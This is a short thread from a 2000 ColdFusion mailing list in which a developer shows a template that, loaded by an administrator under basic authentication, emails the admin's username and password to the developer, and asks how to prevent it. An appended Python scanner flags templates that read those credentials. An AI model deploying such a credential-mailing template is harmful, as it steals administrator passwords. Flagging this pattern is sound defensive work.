You could start by hiring a more intelligent Sys Admin. :)
Ken
----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?
Say I'm a developer, but not a SysAdmin.
It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:
Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:
<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>
How do I prevent this from working?
Thanks,
Jamie
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
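A defensive check for the pattern in the template above, added here as an example and not part of the original thread: a Python scan that flags CFML templates reading the Basic-auth password from the CGI scope, so they can be reviewed before anyone with admin credentials loads them. The sample templates and file names are constructed, and treating cgi.http_authorization as a second accessor is an assumption.

```python
import re

# Constructed sample templates (not from the original thread), keyed by
# hypothetical file names.
SAMPLE_TEMPLATES = {
    "test_passed.cfm": (
        "<html><body>\n"
        "Test Passed!\n"
        '<cfmail to="a@example.invalid" from="b@example.invalid" subject="x">\n'
        "#cgi.auth_user#\n"
        "#cgi.auth_password#\n"
        "</cfmail>\n"
        "</body></html>\n"
    ),
    "bracket.cfm": '<cfset p = CGI["Auth_Password"]>\n',
    "whoami.cfm": "<cfoutput>Hello #cgi.auth_user#</cfoutput>\n",
}

# CFML is case-insensitive, and a scope key can be read with dot or bracket
# notation. HTTP_AUTHORIZATION is included on the assumption that the raw
# Authorization header is exposed through the CGI scope as well.
CRED_REF = re.compile(
    r"""\bcgi\s*(?:\.\s*|\[\s*["'])(auth_password|http_authorization)\b""",
    re.IGNORECASE,
)


def find_credential_reads(templates):
    """Return sorted (file, line_no, variable) for each credential reference."""
    hits = []
    for name, text in templates.items():
        for line_no, line in enumerate(text.splitlines(), start=1):
            for match in CRED_REF.finditer(line):
                hits.append((name, line_no, match.group(1).lower()))
    return sorted(hits)


if __name__ == "__main__":
    for name, line_no, var in find_credential_reads(SAMPLE_TEMPLATES):
        print(f"{name}:{line_no}: reads cgi.{var}")
```

A template that only reads cgi.auth_user is not flagged, since the user name alone is not a credential.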